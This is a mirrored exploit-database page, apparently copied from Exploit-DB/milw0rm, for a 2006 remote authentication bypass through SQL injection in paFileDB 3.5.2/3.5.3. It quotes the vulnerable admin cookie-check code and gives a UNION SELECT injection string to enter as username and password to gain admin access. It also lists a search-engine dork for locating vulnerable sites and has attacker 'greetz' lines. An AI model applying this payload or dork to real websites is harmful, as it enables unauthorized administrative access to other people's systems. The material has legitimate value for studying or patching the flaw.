https://www.exploit-db.com/exploits/2899
paFileDB 3.5.2/3.5.3 - Remote Authentication Bypass / SQL Injection






漏洞ID | 1056102 | 漏洞类型 | |
发布时间 | 2006-12-08 | 更新时间 | 2006-12-08 |
![]() |
N/A | ![]() |
N/A |
漏洞平台 | PHP | CVSS评分 | N/A |
|漏洞来源
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
# PafileDB Login SQL injection =)
# author : koray & manyak@mypower.org
# Risk : High
# Class : Remote
# Vulnerable Script : pafileDB
# Version : 3.5.2 / 3.5.3
# google : powered by pafiledb 3.5.3/2
# greetz : www.cigicigi.net & redhackers
Vulnerable;
include/admin/auth.php
c0de ;
if (isset($_COOKIE['pafiledb_user']) && isset($_COOKIE['pafiledb_pass'])) { //If the cookie exists, do all this:
$admininfo = array();
if (checkpass($_COOKIE['pafiledb_user'], $_COOKIE['pafiledb_pass'], $admininfo)) {
//checkpass() returned true, so the user exists
//$adminloggedin is a var used throughout the script to see if someone's logged in.
$adminloggedin = true;
$smarty->assign('admininfo', $admininfo[0]);
} else { //The cookie exists, but the user/pass don't match
...
username : 1%20union%20select%%20201,2,3,4/*
password : 1%20union%20select%%20201,2,3,4/* /
pafile/pafiledb.php?action=admin logged...
# milw0rm.com [2006-12-08]
检索漏洞
开始时间
结束时间